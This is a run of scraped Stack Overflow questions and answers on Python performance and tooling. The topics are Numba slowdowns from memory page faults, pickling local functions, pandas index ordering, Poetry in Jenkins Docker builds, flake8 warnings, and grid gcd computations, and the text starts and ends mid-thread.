dev. of 7 runs, 10,000 loops each) Now if I define another function and JIT compile it with Numba, the performance of the fast function inexplicably drops: In [6]: @nb.njit(cache=True) ...: def dummy(): ...: pass In [7]: dummy() In [8]: %timeit triangle_half_UR_LL(1000) 980 μs ± 20 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) In [9]: %timeit triangle_half_UR_LL(1000) 976 μs ± 9.9 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) In [10]: %timeit triangle_half_UR_LL(1000) 974 μs ± 3.11 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) This is real, I have successfully reproduced this issue many times without fail, I start a new interpreter session, I paste the code, it runs fast. I define the dummy function then call the dummy function, and the fast function inexplicably slows down. Screenshot as proof: I am using Windows 11, and I absolutely have no idea what the hell is going on. Is there an explanation for this? And how can I prevent this issue? Interestingly if I get rid of nogil parameter and without changing anything else, the problem magically goes away: In [1]: import numpy as np ...: import numba as nb ...: ...: ...: @nb.njit(cache=True, parallel=True) ...: def triangle_half_UR_LL(size: int, swap: bool = False) -> tuple[np.ndarray, np.ndarray]: ...: total = (size + 1) * size // 2 ...: x_coords = np.full(total, 0, dtype=np.uint16) ...: y_coords = np.full(total, 0, dtype=np.uint16) ...: offset = 0 ...: side = np.arange(size, dtype=np.uint16) ...: for i in nb.prange(size): ...: offset = i * size - (i - 1) * i // 2 ...: end = offset + size - i ...: x_coords[offset:end] = i ...: y_coords[offset:end] = side[i:] ...: ...: return (x_coords, y_coords) if not swap else (y_coords, x_coords) In [2]: %timeit triangle_half_UR_LL(1000) 186 μs ± 47.9 μs per loop (mean ± std. dev. of 7 runs, 1 loop each) In [3]: %timeit triangle_half_UR_LL(1000) 167 μs ± 1.61 μs per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [4]: %timeit triangle_half_UR_LL(1000) 166 μs ± 109 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [5]: @nb.njit(cache=True) ...: def dummy(): ...: pass In [6]: dummy() In [7]: %timeit triangle_half_UR_LL(1000) 167 μs ± 308 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [8]: %timeit triangle_half_UR_LL(1000) 166 μs ± 312 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [9]: %timeit triangle_half_UR_LL(1000) 167 μs ± 624 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) Why does this happen? But no, if I define other functions, somehow the first function slows down again. The simplest way to reproduce the issue is just redefining it: In [7]: dummy() In [8]: %timeit triangle_half_UR_LL(1000) 168 μs ± 750 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [9]: import numpy as np In [10]: %timeit triangle_half_UR_LL(1000) 167 μs ± 958 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [11]: import numba as nb In [12]: %timeit triangle_half_UR_LL(1000) 167 μs ± 311 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [13]: @nb.njit(cache=True, parallel=True) ...: def triangle_half_UR_LL(size: int, swap: bool = False) -> tuple[np.ndarray, np.ndarray]: ...: total = (size + 1) * size // 2 ...: x_coords = np.full(total, 0, dtype=np.uint16) ...: y_coords = np.full(total, 0, dtype=np.uint16) ...: offset = 0 ...: side = np.arange(size, dtype=np.uint16) ...: for i in nb.prange(size): ...: offset = i * size - (i - 1) * i // 2 ...: end = offset + size - i ...: x_coords[offset:end] = i ...: y_coords[offset:end] = side[i:] ...: ...: return (x_coords, y_coords) if not swap else (y_coords, x_coords) In [14]: %timeit triangle_half_UR_LL(1000) 1.01 ms ± 94.3 μs per loop (mean ± std. dev. of 7 runs, 1 loop each) In [15]: %timeit triangle_half_UR_LL(1000) 964 μs ± 2.02 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) The slowdown also happens if I define the following function and call it: @nb.njit(cache=True) def Farey_sequence(n: int) -> np.ndarray: a, b, c, d = 0, 1, 1, n result = [(a, b)] while 0 <= c <= n: k = (n + b) // d a, b, c, d = c, d, k * c - a, k * d - b result.append((a, b)) return np.array(result, dtype=np.uint64) In [6]: %timeit triangle_half_UR_LL(1000) 166 μs ± 296 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [7]: %timeit Farey_sequence(16) The slowest run took 6.25 times longer than the fastest. This could mean that an intermediate result is being cached. 6.03 μs ± 5.72 μs per loop (mean ± std. dev. of 7 runs, 1 loop each) In [8]: %timeit Farey_sequence(16) 2.77 μs ± 50.8 ns per loop (mean ± std. dev. of 7 runs, 100,000 loops each) In [9]: %timeit triangle_half_UR_LL(1000) 966 μs ± 6.48 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) | TL;DR: This mainly comes from the system allocator which does not behave the same way regarding the current state of the memory (hard to predict). When the function is fast, there are no page faults, while when the function is slow, it seems there are a lot of page faults slowing down the master thread. Analysis When a Numpy array is created, it request some memory to the standard C library (a.k.a. libc) typically using the malloc function. For large allocations, the libc request some memory space to the OS. For small allocations, it can preallocate some memory space and recycle so to avoid requesting memory to the OS. Indeed, such OS is pretty expensive. Moreover, the virtual memory pages requested by the OS is not physically mapped in RAM when the OS give you the memory space. This is done lazily: when memory is read or written (page per page). This is by the way why np.zeros and np.empty can be faster than np.full (see this post for more information about this). This principle is called overcommit. When a program read/write a page which is not yet mapped in RAM, the MMU trigger an interruption so for the OS to do the actual mapping of the virtual page to a physical page in RAM. This is called a page fault and it is very expensive. Indeed, not only exception are very expensive, but also all modern OS write zeros to mapped pages during a page fault for security reasons (because the page would contain possibly sensitive data of other processes like browsers' passwords). The default allocator of the libc tends not to be conservative. I means it tends to give memory back to the OS and request it again. This means other processes can use this available memory, but it makes processes often requesting memory significantly slower. Regarding the amount of data allocated so far and the overall state of the cached pages, the allocator may or may not request more memory to the OS. Thus, page faults may or may not happens. On top of that, when there is enough contiguous space in the preallocated memory buffers of the libc, the default allocator may or may not recycle a buffer that has been already used recently and stored in the CPU cache. When this happens, there is no need to fetch data from the slow DRAM, it is already there. This effect often happens in loops creating temporary arrays and writing/reading them before (implicitly) deleting them. Here is a practical explanation: Case 1) After the first call of the function, the 2 arrays are stored in the cache assuming is it small enough to fit in it (which is the case here on my PC). One the function is executed, the array is automatically freed but the default allocator does not release it back to the OS. Instead the memory space is recycled for the next function call and this new one can be much faster: no page fault and no need to fetch data from the DRAM! This can happen many times as long as the state of allocated memory does not suddenly change in a way there is no available memory space left for the requested memory arrays. If this case happens, we should see almost no DRAM read/writes nor any page-faults-related system calls (hard to track on Windows). Case 2) At the end of the first function, memory is released back to the OS and then the next function call need to pay the huge overhead of page fault and also DRAM fetches. In fact data should AFAIK even be written back to the DRAM and fetched again (since the chance for both the virtual/physical page to be the same is small and also because of TLB flushes during the unmapping). If this case happens, we should see significant faults-related system calls and certainly also significantly more DRAM reads/writes. Case 3) The libc always recycle memory but the address of the arrays are not always the same. In this case, page faults do not happen but the amount of read/written memory space can be much bigger than what is actually strictly required. This memory space can be so large it does not fit in cache. In this case, cache trashing happens causing expensive DRAM reads/writes. If this case happens, we should not see any page-faults-related function calls or associated overhead, but still significant DRAM reads/writes. Based on this, we should be able to make the problem more likely to happen (not guaranteed) if we allocated many arrays of variable size so to change the state of the allocated memory space. Experimental results On my (Windows 10) machine, here is what I get when I succeed to reproduce the effect: In [2]: %timeit triangle_half_UR_LL(1000) 135 μs ± 42 μs per loop (mean ± std. dev. of 7 runs, 1 loop each) In [3]: %timeit triangle_half_UR_LL(1000) 138 μs ± 37.5 μs per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [4]: %timeit triangle_half_UR_LL(1000) 117 μs ± 873 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [5]: %timeit triangle_half_UR_LL(1000) 140 μs ± 11.7 μs per loop (mean ± std. dev. of 7 runs, 10,000 loops each) In [6]: a = np.full(10, 0, dtype=np.uint16) In [7]: b = np.full(100, 0, dtype=np.uint16) In [8]: c = np.full(1000, 0, dtype=np.uint16) In [9]: d = np.full(10000, 0, dtype=np.uint16) In [10]: e = np.full(100000, 0, dtype=np.uint16) In [11]: f = np.full(1000000, 0, dtype=np.uint16) In [12]: g = np.full(10000000, 0, dtype=np.uint16) In [13]: h = np.full(100000000, 0, dtype=np.uint16) In [14]: %timeit triangle_half_UR_LL(1000) 932 μs ± 4.04 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) In [15]: %timeit triangle_half_UR_LL(1000) 935 μs ± 1.23 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) We can see that creating temporary array do impact the performance of the function as expected. Compiling Numba function do allocate some memory (quite a lot AFAIK) and so it can produce a similar impact. When the function is fast, the DRAM throughput is 1 GiB/s (~30% are writes), while it is 6 GiB/s (50~60% are writes) when the function is significantly slower. Note that I have some processes running in background taking about ~0.1 GiB/s in average (pretty variable). When the function is fast, I can also see that 20~35% of the time is spent in the kernel which is not great (but strangely nearly no kernel time in the master thread). This is typically due to page-faults for such a code, but also possibly I/O operations due to the cache=True option (unlikely since it should only happens in the master thread), or context switches (I see some of them occurring though it does not seems a major issue) especially due to the parallel execution, or waiting time of worker threads (certainly due to some load imbalance). The later seems to be a significant issue but this seems normal to me for rather memory-bound codes like yours. When the function is slow, the fraction of time spent in the kernel is slightly bigger (20~40%) in workers and much bigger in the master thread (30~85%). Unfortunately, I cannot profile the Windows kernel (as opposed to Linux) so to track the page-fault-related function calls... The reported call-stack in the low-level profiler I used (VTune) does not seems to provide such an information. I can safely say that this is apparently nothing related to I/O operations since there is very few I/Os during the computation. Experimentally, the clear biggest difference is the kernel time spent in the main thread (in read on the scheduling plot): Fast execution: Slow execution: Thus, I think the kernel time spent in the main thread is likely the one increasing significantly the execution time. This means the portion of code not in the prange loop unless page faults can happen in it. The culprit is thus these lines: x_coords = np.full(total, 0, dtype=np.uint16) y_coords = np.full(total, 0, dtype=np.uint16) side = np.arange(size, dtype=np.uint16) Conclusion This confirms the theory explained before: when the execution is fast, nearly no page faults happens (since nearly no time is spent in the kernel on the master thread) and data seems to mostly fit in CPU caches; when the execution is slow a significant fraction of the time is spent in the kernel in the Numpy function doing only memory operations so the only source of kernel overhead is page fault. This is very likely because the libc allocator often release the memory back to the OS (possibly even after each function call when the array are not needed anymore) and requests it back later. Moreover, we can see an increase of the DRAM throughput as expected in this case. Fix / Workaround On Linux, you can easily use another more conservative allocator (e.g. TC-malloc) by tweaking the LD_PRELOAD variable. On Windows, this is apparently more complicated (this might works with TC-malloc)... An alternative solution is just to do page fault as much as possible in parallel so to reduce their overhead by creating Numpy array with np.empty or np.zeros. That being said, page faults tend to poorly scale on Windows (as opposed to Linux were it is often significantly better). The best solution is just to preallocate and pre-fault arrays at initialisation-time and avoid temporary arrays as much as possible in critical portions of your program (even in benchmarks for the sake of reproducibility), especially large temporary arrays. In HPC application, preallocation is very common (also to avoid out-of-memory issues after >10h of computations on >100 machines). In native programs caring about performance, like games, HPC applications (and even browsers) custom allocators are often to avoid such issues (and the overhead of allocations). Unfortunately, in Python and especially in Numpy, it is very common to create a lot of new objects and temporary arrays (and even often promoted) although this is pretty inefficient (and makes benchmark more complicated), and AFAIK we cannot easily write custom allocators for Numpy/CPython. It is sometimes difficult to preallocate/pre-fault arrays because we do not always know the size before some computations. It also often make the Python code more complex. The same thing is true with in-place Numpy operations (which can be used to avoid temporary arrays). | 3 | 8 |
79,569,325 | 2025-4-11 | https://stackoverflow.com/questions/79569325/cannot-pickle-local-function-when-sending-callable-filter-objects-via-multiproce | Problem Description I'm developing a FilterBroker class that manages callable filters for subscriber processes. The broker receives functions wrapped in a Filter object via a message queue. However, I'm encountering a pickling error when trying to send a locally defined function: AttributeError: Can't get local object 'task.<locals>.function' The error occurs because the function is defined inside another function (task()) and is therefore not picklable, but I need to support sending lambda and locally defined functions. Code Example Here's a minimal reproducible example showing the issue: from threading import Thread from multiprocessing import Queue, Manager, Process from dataclasses import dataclass from typing import Optional import logging import inspect @dataclass class Service: id: Optional[int] = None name: str = "" port: int = 0 class Filter: def __init__(self, filter_function: callable): self.filter_function: callable = filter_function self.subscribers: list[Service] = [] def __call__(self, *args, **kwds): return self.filter_function(*args, **kwds) class FilterBroker(Thread): def __init__(self, queue: Queue) -> None: super().__init__() self.queue = queue self.filters: dict[str, Filter] = {} def add_filter(self, name: str, filter: Filter): if len(inspect.signature(filter).parameters) != 2: raise TypeError("Invalid Filter: must have exactly two parameters") self.filters[name] = filter def run(self): class_name = self.__class__.__name__ logging.info(f"[{class_name}]: Process started") while True: try: task = self.queue.get() logging.debug(f"[{class_name}]: Task received: {task}") if task is None: break if not isinstance(task, tuple) or not callable(task[0]) or not isinstance(task[1], Queue): continue response_queue, method, *args = task response = method(self, *args) except Exception: response = None finally: response_queue.put_nowait(response) @staticmethod def ask(fb: 'FilterBroker', *task): response_queue = Manager().Queue() fb.queue.put((response_queue, *task)) print("I put in queue") result = response_queue.get() print("I got result") response_queue.close() return result manager = Manager() broker = FilterBroker(manager.Queue()) broker.start() def task(broker): def function(x): return x > 0 f = Filter(function) print(f(2)) FilterBroker.ask(broker, FilterBroker.add_filter, 'test', f) logging.debug(f"Filter added") process = Process(target=task, args=(broker,)) process.start() process.join() print("Process finished") Full Error Traceback Traceback (most recent call last): File "/usr/lib64/python3.13/multiprocessing/process.py", line 313, in _bootstrap self.run() ~~~~~~~~^^ File "/usr/lib64/python3.13/multiprocessing/process.py", line 108, in run self._target(*self._args, **self._kwargs) ~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/home/****/Scrivania/github/ctf_proxy/refactoring/test.py", line 22, in task fb.ask(broker, fb.add_filter, 'test', f) ~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/home//****/Scrivania/github/ctf_proxy/refactoring/proxy/multiprocess/FilterBroker.py", line 299, in ask fb.queue.put((response_queue, *task)) ~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^ File "<string>", line 2, in put File "/usr/lib64/python3.13/multiprocessing/managers.py", line 830, in _callmethod conn.send((self._id, methodname, args, kwds)) ~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib64/python3.13/multiprocessing/connection.py", line 206, in send self._send_bytes(_ForkingPickler.dumps(obj)) ~~~~~~~~~~~~~~~~~~~~~^^^^^ File "/usr/lib64/python3.13/multiprocessing/reduction.py", line 51, in dumps cls(buf, protocol).dump(obj) ~~~~~~~~~~~~~~~~~~~~~~~^^^^^ AttributeError: Can't get local object 'task.<locals>.function' Question How can I modify my code to support sending locally defined functions and lambdas via multiprocessing? I want subscribers to be able to register and retrieve custom filter functions without having to define them at the module level. | you should use cloudpickle, you'll have to do the cloudpickle.dumps and cloudpickle.loads yourself. from threading import Thread from multiprocessing import Queue, Manager, Process from dataclasses import dataclass from typing import Optional import logging import inspect import cloudpickle @dataclass class Service: id: Optional[int] = None name: str = "" port: int = 0 class Filter: def __init__(self, filter_function: callable): self.filter_function: callable = filter_function self.subscribers: list[Service] = [] def __call__(self, *args, **kwds): return self.filter_function(*args, **kwds) class FilterBroker(Thread): def __init__(self, queue: Queue) -> None: super().__init__() self.queue = queue self.filters: dict[str, Filter] = {} def add_filter(self, name: str, filter: Filter): if len(inspect.signature(filter).parameters) != 2: raise TypeError("Invalid Filter: must have exactly two parameters") self.filters[name] = filter def run(self): class_name = self.__class__.__name__ logging.info(f"[{class_name}]: Process started") while True: try: task = self.queue.get() logging.debug(f"[{class_name}]: Task received: {task}") if task is None: break response_queue, pickled_task = task method, *args = cloudpickle.loads(pickled_task) response = method(self, *args) except Exception: import traceback traceback.print_exc() response = None finally: if task is not None: response_queue.put_nowait(response) class FilterBrokerAsker: def __init__(self, queue: Queue) -> None: super().__init__() self.queue = queue @staticmethod def ask(fb: 'FilterBrokerAsker', *task): pickled_task = cloudpickle.dumps(task) response_queue = Manager().Queue() fb.queue.put((response_queue, pickled_task)) print("I put in queue") result = response_queue.get() print("I got result") return result def task(broker): def function(x): print("running local function!") return x > 0 f = Filter(function) print(f(2)) FilterBrokerAsker.ask(broker, FilterBroker.add_filter, 'test', f) logging.debug(f"Filter added") if __name__ == "__main__": manager = Manager() broker = FilterBroker(manager.Queue()) broker.start() broker_data = FilterBrokerAsker(broker.queue) process = Process(target=task, args=(broker_data,)) process.start() process.join() print("Process finished") broker.queue.put(None) running local function! True I put in queue I got result Process finished the split to FilterBrokerAsker is to get it to work with spawn instead of fork, as threads are not picklable. note that cloudpickle has problems with imports, and you may need to re-import things inside your functions, the whole concept is very fragile, and FWIW you should just use threads instead. | 2 | 1 |
79,569,500 | 2025-4-11 | https://stackoverflow.com/questions/79569500/how-can-i-sort-order-of-index-based-on-my-preference-in-multi-index-pandas-dataf | I have a pandas dataframe df. It has multi-index with Gx.Region and Scenario_Model. The Scenario_Model index is ordered in alphabetical order des, pes, tes. When I plot it, it comes in the same order. However, I want to reorder it as pes, tes and des, and plot it accordingly. Is it possible to achieve it in Python pandas dataframe? dict = {('Value', 2023, 'BatteryStorage'): {('Central Africa', 'des'): 0.0, ('Central Africa', 'pes'): 0.0, ('Central Africa', 'tes'): 0.0, ('Eastern Africa', 'des'): 0.0, ('Eastern Africa', 'pes'): 0.0, ('Eastern Africa', 'tes'): 0.0, ('North Africa', 'des'): 0.0, ('North Africa', 'pes'): 0.0, ('North Africa', 'tes'): 0.0, ('Southern Africa', 'des'): 504.0, ('Southern Africa', 'pes'): 100.0, ('Southern Africa', 'tes'): 360.0, ('West Africa', 'des'): 0.0, ('West Africa', 'pes'): 0.0, ('West Africa', 'tes'): 0.0}, ('Value', 2023, 'Biomass PP'): {('Central Africa', 'des'): 0.0, ('Central Africa', 'pes'): 0.0, ('Central Africa', 'tes'): 0.0, ('Eastern Africa', 'des'): 40, ('Eastern Africa', 'pes'): 10, ('Eastern Africa', 'tes'): 50, ('North Africa', 'des'): 0.0, ('North Africa', 'pes'): 0.0, ('North Africa', 'tes'): 0.0, ('Southern Africa', 'des'): 90.0, ('Southern Africa', 'pes'): 43.0, ('Southern Africa', 'tes'): 50.0, ('West Africa', 'des'): 200.0, ('West Africa', 'pes'): 150.0, ('West Africa', 'tes'): 100}} df_sample = pd.DataFrame.from_dict(dict) df_sample.plot(kind = "bar", stacked = True) | A quick an easy approach, if you know the categories, would be to reindex: (df_sample.reindex(['pes', 'tes', 'des'], level=1) .plot(kind='bar', stacked=True) ) A more canonical (but more complex) approach would be to make the second level an ordered Categorical: order = pd.CategoricalDtype(['pes', 'tes', 'des'], ordered=True) (df_sample .set_axis(pd.MultiIndex.from_frame(df_sample.index.to_frame() .astype({1: order}), names=[None, None])) .sort_index() .plot(kind='bar', stacked=True) ) Output: | 3 | 2 |
79,569,039 | 2025-4-11 | https://stackoverflow.com/questions/79569039/python-is-installed-in-two-different-locations | I am trying to get the latest version of Python to run on my Linux Ubuntu 24.04 system, but the older version is still showing as current. There are two locations that Python is configured, '/usr/bin' and '/usr/local/bin'. How should I handle this to get the correct configuration on my system? I tried ~-> $ python --version and the response is Python 3.12.3 But, when I try ~-> $ python3 --version the response is Python 3.13.3 Python installation | Simply put one Python path in front of the other, for example if you want /usr/local/bin to be found before /usr/bin, then do this: export PATH=/usr/local/bin:${PATH} in your shell. If you are satisfied with the result, put the above line in your ~/.bashrc. | 1 | 1 |
79,568,585 | 2025-4-11 | https://stackoverflow.com/questions/79568585/running-poetry-in-using-jenkins-dockerfile | I've got my dockerfile FROM git.corp.com:4567/some/python:3.11-slim RUN apt update; \ apt install pipx -y; \ pipx install poetry; \ pipx ensurepath; \ chmod a +rx /root/.local/bin/poetry; \ ln -s /root/.local/bin/poetry /usr/bin/poetry; \ and my jenkins stage stage('Test') { agent { dockerfile{ filename 'Dockerfile.build' args "-v $WORKSPACE:/app" reuseNode true } } steps { sh """ ls -l poetry poetry install --no-root -E tests -E mypy -E lint PYTHONPATH="$PWD/src" pytest """ } } Why do I get this message? script.sh.copy: 3: poetry: Permission denied I've changed permessions using chmod a +rx ls -l poetry output looks like this lrwxrwxrwx 1 root root 23 Apr 11 10:02 /usr/bin/poetry -> /root/.local/bin/poetry I know Jenkins pass -u 1000:1000 arguments to docker run command but shouldn't chmod fix this? | Try to install Poetry to the path which will be available to all users instead of installing it to /root/.local ENV PIPX_HOME=/opt/pipx \ PIPX_BIN_DIR=/usr/local/bin RUN apt update && \ apt install pipx -y && \ pipx install poetry | 1 | 3 |
79,568,097 | 2025-4-11 | https://stackoverflow.com/questions/79568097/python-static-class-variable-in-nested-class | I have a nested class that uses static vars to have class wide parameters and accumulators. If I do it as a standalone class it works. If I do a nested class and inherit the standalone class, it works. But I can't get a nested class to have static class variables, the interpreter gets confused. What am I doing wrong? Code snippet: class Cl_static_parameter_standalone: #static var common to all instances. Two uses: common settings, common accumulator c_n_counter : int = 0 @staticmethod def increment() -> int: Cl_static_parameter_standalone.c_n_counter += 1 return Cl_static_parameter_standalone.c_n_counter class Cl_some_class: class Cl_static_parameter_inherited(Cl_static_parameter_standalone): pass class Cl_static_parameter_nested: c_n_counter : int = 0 @staticmethod def increment() -> int: Cl_static_parameter_nested.c_n_counter += 1 return Cl_static_parameter_nested.c_n_counter def __init__(self): return def do_something(self): print(f"Execute Standalone: {Cl_static_parameter_standalone.increment()}") print(f"Execute Inherited: {self.Cl_static_parameter_inherited.increment()}") print(f"Execute Nested: {self.Cl_static_parameter_nested.increment()}") return my_instance = Cl_some_class() my_instance.do_something() Output: Execute Standalone: 1 Execute Inherited: 2 Traceback (most recent call last): File "stack_overflow_class_static_parameter.py", line 52, in <module> my_instance.do_something() ~~~~~~~~~~~~~~~~~~~~~~~~^^ File "stack_overflow_class_static_parameter.py", line 48, in do_something print(f"Execute Nested:{self.Cl_static_parameter_nested.increment()}") ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^ File "stack_overflow_class_static_parameter.py", line 38, in increment Cl_static_parameter_nested.c_n_counter += 1 ^^^^^^^^^^^^^^^^^^^^^^^^^^ NameError: name 'Cl_static_parameter_nested' is not defined. Did you mean: 'Cl_static_parameter_standalone'? | You can use the classmethod decorator, which is more appropriate for this situation anyways: class C: class Nested: counter = 0 @classmethod def increment(cls) -> int: cls.counter += 1 return cls.counter print(C().Nested.increment()) # prints 1 If you are wondering why increment can't find Cl_static_parameter_nested in your example: you would have to write Cl_some_class.Cl_static_parameter_nested to access it from the global namespace. | 1 | 2 |
79,567,933 | 2025-4-11 | https://stackoverflow.com/questions/79567933/using-a-class-property-as-an-iterable-produces-a-reassign-warning | I need to use an iterable and a loop variable as a class property. But the flake8 checker produces B2020 warning: easy.py:11:13: B020 Found for loop that reassigns the iterable it is iterating with each iterable value. If I use a variable for iterable there is OK. What is wrong? The warning example: #!/usr/bin/env python3 """Example of B020 error.""" class My_Template: """My example.""" def __init__(self, *template): """Obviously init.""" self.all_templates = (1, 2, 3) for self.tpl in self.all_templates: print(self.tpl) The flake8 complains about loop variable: easy.py:11:13: B020 Found for loop that reassigns the iterable it is iterating with each iterable value. The OK example: #!/usr/bin/env python3 """Example of B020 error.""" class My_Template: """My example.""" def __init__(self, *template): """Obviously init.""" all_templates = (1, 2, 3) for self.tpl in all_templates: print(self.tpl) | It's a known issue: https://github.com/PyCQA/flake8-bugbear/issues/248 Understandably flake8-bugbear developers are a bit unwilling to fix this as it's not very common to use an instance attribute as the loop variable. It's also not really needed. You can simply use a normal loop variable: class My_Template: def __init__(self, *template): self.all_templates = (1, 2, 3) for tpl in self.all_templates: self.tpl = tpl print(self.tpl) | 1 | 1 |
79,564,589 | 2025-4-9 | https://stackoverflow.com/questions/79564589/how-to-find-all-grid-points-that-correspond-to-non-reduced-fractions-in-a-square | Given a positive integer N, we can label all grid points in the square N x N, starting at 1, the total number of grid points is N x N, and the grid points are list(itertools.product(range(1, N + 1), repeat=2)). Now, I want to find all tuples (x, y) that satisfies the condition x/y is a non-reduced fraction, the following is a bruteforce implementation that is guaranteed to be correct, but it is very inefficient: import math from itertools import product def find_complex_points(lim: int) -> list[tuple[int, int]]: return [ (x, y) for x, y in product(range(1, lim + 1), repeat=2) if math.gcd(x, y) > 1 ] Now the next function is slightly smarter, but it generates duplicates and as a result is only noticeably faster but not by much: def find_complex_points_1(lim: int) -> set[tuple[int, int]]: lim += 1 return { (x, y) for mult in range(2, lim) for x, y in product(range(mult, lim, mult), repeat=2) } In [255]: %timeit find_complex_points(1024) 233 ms ± 4.44 ms per loop (mean ± std. dev. of 7 runs, 1 loop each) In [256]: %timeit find_complex_points_1(1024) 194 ms ± 1.9 ms per loop (mean ± std. dev. of 7 runs, 10 loops each) Is there a better way to accomplish this? (My goal is simple, I want to create a NumPy 2D array of uint8 type with shape (N, N), fill it with 255, and make all pixels (x, y) 0 if (x+1)/(y+1) is a non-reduced fraction) I have devised a method that is smarter than both my previous ones by a wide margin, and also tremendously faster, but it still generates duplicates, I have opt to not to use a set here so that you can copy-paste the code as is and run some tests and see the exact output in the order they are generated: def find_complex_points_2(lim: int) -> set[tuple[int, int]]: stack = dict.fromkeys(range(lim, 1, -1)) lim += 1 points = [] while stack: x, _ = stack.popitem() points.append((x, x)) mults = [] for y in range(x * 2, lim, x): stack.pop(y, None) mults.append(y) points.extend([(x, y), (y, x)]) for i, x in enumerate(mults): points.append((x, x)) for y in mults[i + 1:]: points.extend([(x, y), (y, x)]) return points In [292]: sorted(set(find_complex_points_2(1024))) == find_complex_points(1024) Out[292]: True In [293]: %timeit find_complex_points_2(1024) 58.9 ms ± 580 μs per loop (mean ± std. dev. of 7 runs, 10 loops each) In [294]: %timeit find_complex_points(1024) 226 ms ± 3.24 ms per loop (mean ± std. dev. of 7 runs, 1 loop each) To clarify, the output of find_complex_points_2(10) is: In [287]: find_complex_points_2(10) Out[287]: [(2, 2), (2, 4), (4, 2), (2, 6), (6, 2), (2, 8), (8, 2), (2, 10), (10, 2), (4, 4), (4, 6), (6, 4), (4, 8), (8, 4), (4, 10), (10, 4), (6, 6), (6, 8), (8, 6), (6, 10), (10, 6), (8, 8), (8, 10), (10, 8), (10, 10), (3, 3), (3, 6), (6, 3), (3, 9), (9, 3), (6, 6), (6, 9), (9, 6), (9, 9), (5, 5), (5, 10), (10, 5), (10, 10), (7, 7)] As you can see, (10, 10) shows up twice. I want to avoid redundant computations. Also this happens in find_complex_points_1, if I don't use a set, then many duplicates will be included, because the method used will inevitably generate them repeatedly, by using a set there still is unnecessary computation, it just doesn't collect the duplicates. And no, I actually want the coordinates to be replaced by the sum of all numbers before it, so N is replaced by (N2 + N) / 2. I just implemented the image generation to better illustrate what I want: import numpy as np import numba as nb @nb.njit(cache=True) def resize_img(img: np.ndarray, h_scale: int, w_scale: int) -> np.ndarray: height, width = img.shape result = np.empty((height, h_scale, width, w_scale), np.uint8) result[...] = img[:, None, :, None] return result.reshape((height * h_scale, width * w_scale)) def find_composite_points(lim: int) -> set[tuple[int, int]]: stack = dict.fromkeys(range(lim, 1, -1)) lim += 1 points = set() while stack: x, _ = stack.popitem() points.add((x, x)) mults = [] for y in range(x * 2, lim, x): stack.pop(y, None) mults.append(y) points.update([(x, y), (y, x)]) for i, x in enumerate(mults): points.add((x, x)) for y in mults[i + 1 :]: points.update([(x, y), (y, x)]) return points def natural_sum(n: int) -> int: return (n + 1) * n // 2 def composite_image(lim: int, scale: int) -> np.ndarray: length = natural_sum(lim) img = np.full((length, length), 255, dtype=np.uint8) for x, y in find_composite_points(lim): x1, y1 = natural_sum(x - 1), natural_sum(y - 1) img[x1 : x1 + x, y1 : y1 + y] = 0 return resize_img(img, scale, scale) composite_image(12, 12) | The algorithm of Weeble runs in O(n² m²) where m is the size of integers in bits (using a naive multiplication). Since we can assume the multiplication of numbers to be done in constant time (due to bounded native integers used by Numpy), this means O(n²) but with a significant hidden constant which should not be neglected. Performance wise, the algorithm is bounded by inefficient page fault operations and the filling of big temporary arrays. It is far from being optimal. The algorithm of Pete Kirkham should run in O(n²) (hard to prove formally though) with a relatively small hidden constant. This is is a good approach. However, is is very slow because of inefficient scalar Numpy operations instead of vectorised ones. Fortunately, it can be easily vectorised: array = np.full((N,N), 255, np.uint8) for d in range(2, N+1): array[d-1:N:d, d-1:N:d] = 0 Note I corrected the implementation to return correct results (with values 0 and 255). A very simple alternative solution is just to use Numba so to speed up the code of Pete Kirkham. That being said, the code is not efficient because it iterates on items of different rows in the inner most loop. We can easily fix that by swapping variables: import numba as nb @nb.njit('(int32,)') def compute(N): array = np.full((N,N), 255, np.uint8) for denominator in range(2, N+1): for i in range(denominator, N+1, denominator): for j in range(denominator, N+1, denominator): array[i-1, j-1] = 0 return array Faster alternative approach Note that the output matrix is symmetric so we don't even need to compute the bottom-left part. Indeed, gcd(a, b) == gcd(b, a). Unfortunately, I do not think the can use this property to make the Numpy vectorised code but we can probably make the Numba code faster. Moreover, the diagonal can be trivially set to 0 (except the first item) since gcd(a, a) == a so gcd(a, a) > 1 if a > 1. Technically, we can also trivially set the direct neighbourhood of the diagonal (i.e. array.diagonal(1)) to 255 since gcd(a, a-1) = 1. array.diagonal(1) should be filled with alternating values (i.e. [255, 0, 255, 0, ...]) since gcd(a, a-2) = gcd(a, 2) = 2 - (a % 2). A similar strategy can be applied for array.diagonal(2). For other diagonal, it starts to be more complex since we certainly need to factorise numbers. Factorising numbers is known to be expensive, but this cost is amortised here since we need to do that O(n) times. Another symmetry of the gcd is gcd(a, b) = gcd(a, b-a) = gcd(a-b, b). We can leverage all these symmetry of the gcd so to write a significantly faster implementation using dynamic programming. A naive implementation (combining all the symmetries rather efficiently) is the following: @nb.njit('(int32,)') def compute_v2(n): arr = np.empty((n,n), np.uint8) arr[:, 0] = 255 arr[0, :] = 255 for i in range(1, n): for j in range(1, i): arr[i, j] = arr[j, i-j-1] # <--- 